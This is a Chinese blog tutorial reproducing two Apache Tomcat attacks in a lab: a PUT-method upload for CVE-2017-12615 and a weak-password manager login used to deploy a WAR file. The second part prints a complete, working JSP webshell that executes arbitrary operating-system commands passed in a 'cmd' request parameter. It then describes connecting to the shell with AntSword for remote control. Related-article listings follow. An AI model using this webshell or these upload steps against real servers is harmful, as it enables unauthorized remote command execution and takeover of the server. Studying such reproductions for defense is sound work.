Tomcat漏洞

最新推荐文章于 2024-09-07 00:04:40 发布
最新推荐文章于 2024-09-07 00:04:40 发布
阅读量527 收藏 3
点赞数 1
文章标签: tomcat java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/klcyl_0106/article/details/124999080
版权

1.Tomcat put方法任意文件上传漏洞(CVE-2017-12615)

进入环境
在这里插入图片描述在这里插入图片描述在这里插入图片描述输入http://ip:8080
在这里插入图片描述抓包并改包:

PUT /shell.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell...

在这里插入图片描述输入http:ip:8080/shell.jsp
在这里插入图片描述显示jsp马上传成功
之后可以通过蚁剑进行连接,远程控制操作

2.弱口令

在这里插入图片描述
Tomcat 支持通过后端部署 war 文件,因此我们可以直接将 webshell 放入 Web 目录。为了访问后端,需要权限。
在这里插入图片描述配置:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
重启tomcat,再进入首页
在这里插入图片描述进行登录
在这里插入图片描述可以在后台上传war包,我们可以将jsp代码植入到war包里面,然后访问该war包即可执行jsp代码。
war包制作:
2.jsp:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
 StringBuilder line = new StringBuilder();
 try {
  Process pro = Runtime.getRuntime().exec(c);
  BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
  String temp = null;
  while ((temp = buf.readLine()) != null){
   line.append(temp+"\\n");
  }
  buf.close();
 } catch (Exception e) {
  line.append(e.getMessage());
 }
 return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
 out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
 out.println(":-)");
}
%>

在这里插入图片描述
在这里插入图片描述在这里插入图片描述上传
在这里插入图片描述访问木马文件,并传入命令参数:在这里插入图片描述这里war包的制作还可以用msf
之后,就可以通过蚁剑进行连接,执行cmd命令,对服务器进行操作了。

kcllg
关注
Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1341
来到vulhub/tomcat/tomcat8/靶场。
Tomcat漏洞汇总复现
sinat_36853972的博客
10-26 1750
Tomcat漏洞汇总复现 CVE-2017-12615 0x00 漏洞原理 CVE-2017-12615是Tomcat PUT方法任意写文件漏洞。该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器,从而获取权限。 一般情况下,Tomcatweb.xml默认不存在这个漏洞,但是如果开放者将web.xml中的readonly设置为false,就会导致可以通过PUT/DELETE进行文件操控。 该漏洞的主要成因是web.xml中的readonly <init-param> &l
tomcat常见漏洞
qq_46416934的博客
06-18 3450
目录前言一、任意文件上传1.1 影响版本1.2 初始配置1.3 漏洞详情二、CVE-2020-1938?文件包含漏洞2.1 影响版本2.2 漏洞详情三、未授权弱口令+war后门上传总结tomcat和apache一样是一个免费的服务器,主要用于jsp框架的网站,可以看作是apache的一个扩展,但是运行的时候和apache属于不同的进程。本文主要介绍tomcat的未授权访问、任意文件上传、文件包含漏洞tomcat 7.0.x --------------cve-2017-12615需要在windows下将配
Tomcat漏洞利用
cc1988429的专栏
10-13 3701
Tomcat是Apache软件基金会的一个免费的、开放源码的WEB应用服务器,可以运行在Linux和Windows等多个平台上,由于其性能稳定、扩展性好、免费等特点深受广大用户的喜爱。目前,互联网上绝大多数JAVA WEB应用都运行在Tomcat服务器上。 Tomcat作为Web应用的载体,一旦出现安全问题,那么运行在其上的Web应用的安全也无法得到保障,所以研究Tomcat漏洞安全性就
Tomcat漏洞详解
最新发布
apple_74953689的博客
09-07 1286
Tomcat是一个开源的Servlet容器,由Apache软件基金会开发,用于托管。它实现了Java Servlet和JavaServer Pages(JSP)技术,并提供了一些特有的Web服务器功能,如管理和控制平台、安全域管理和阀等。
tomcat5.0的一个bug
06-19 338
启动tomcat5.0时,抛出异常: org.apache.jasper.JasperException:Unable to compile class for JSP: (环境:jdk1.5、tomcat5.0) 解决方法: 将C:\Java\jdk1.5.0_08\lib\tools.jar拷贝到E:\Apache Software Foundation\Tomcat5.0\commo
[中间件漏洞]tomcat漏洞复现
紫洋的博客
06-01 1442
Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数 由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代 码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
tomcat系列漏洞
qq_56150805的博客
05-06 2301
Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP 协议的请求,而AJP比http更加优化,多用于反向、集群等,漏洞由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用,是开发和调试Servlet、JSP 程序的首选。
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
tomcat漏洞大杂烩1
08-03
【标题】:“Tomcat漏洞大杂烩1” 【描述】:描述中提到的是一些关于Tomcat服务器的安全问题,特别是Windows环境下的一些限制以及NTFS流的特性。在Windows系统下,文件名不允许以空格结尾,这是一个操作系统级别的...
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 幽灵猫getshell war包getshell 任意文件上传
tomcat-5.5.20
03-23
免安装版下载tomcat,tomcat-5.5.20.zip,用了很久没什么问题。解压完后就可以使用
apache tomcat-5.5.23 这个版本很难找到了
05-29
apache tomcat-5.5.23 这个版本很难找到了
Tomcat 5.0.28 项目部署问题
SecondJanuary
10-17 1319
偶然的情况下需要在2013年10月分这个时间还要使用 Tomcat 5.0.28部署了一个纯静态的web工程,直接 copy 项目文件夹到 ${CATALINA_HOME}/webapps 下,发现死活无法访问于是各方查资料,浪费了将近半个小时,这对一个声程搞了 4 年 web 开发的人来说是多么丢人的一件事啊,一个静态项目半天也没有部署上去抱着试试的思想 copy 整个项目文件夹到 ${CATA
Tomcat 又爆安全漏洞,情何以堪
fyqcdbdx的专栏
09-28 813
CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication   严重性: 中等 所影响的版本: - - Tomcat 7.0.0 to 7.0.11 - - Tomcat
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
网络安全。
02-19 1523
0x01 简介 在windows或linux服务器下将readonly参数设置为false(false并非默认配置),可通过PUT方法创建一个jsp文件,可执行任意命令。 &amp;lt;servlet&amp;gt; &amp;lt;servlet-name&amp;gt;default&amp;lt;/servlet-name&amp;gt; &amp;lt;servlet-class&amp;gt;org.apache
tomcat5.5后台登陆问题
aiyan2001
04-17 197
在windows下tomcat5.5是有一个后台访问的页面的,在里面可以看进程数什么的。要进行如下修改才能看到该页面:       1.修改文件tomcat/conf/tomcat-users.xml,添加        &lt;role rolename="manager"/&gt;        &lt;role rolename="admin"/&gt;        &lt...
apache-tomcat漏洞处理
weixin_51611396的博客
07-07 368
在等保公司扫出服务器上有tomcat漏洞,基本上都是tomcat版本过低导致tomcat漏洞出现,解决方法就是升级tomcat版本。
tomcat漏洞利用
Deeeelete的博客
11-06 1012
目前并没有在windows上测试 1.搜寻kali中的cmd.war文件,路径最长的就是我们需要的 find / -name "cmd.war" 2.将文件复制到根目录下 cp /usr/share/clusterd/src/lib/resources/cmd.war /cmd.war 3.tomcat默认是8080,也可以提前用nmap扫描端口确认一下 namp -sV ip地址 ...
Tomcat漏洞修复步骤详解
"Tomcat漏洞处理方法" 在网络安全领域,及时修复软件漏洞至关重要,尤其是对于像Apache Tomcat这样的流行Java应用服务器。Apache Tomcat是许多企业级应用的基础,因此确保其安全性是运维工作的重要部分。本资源主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值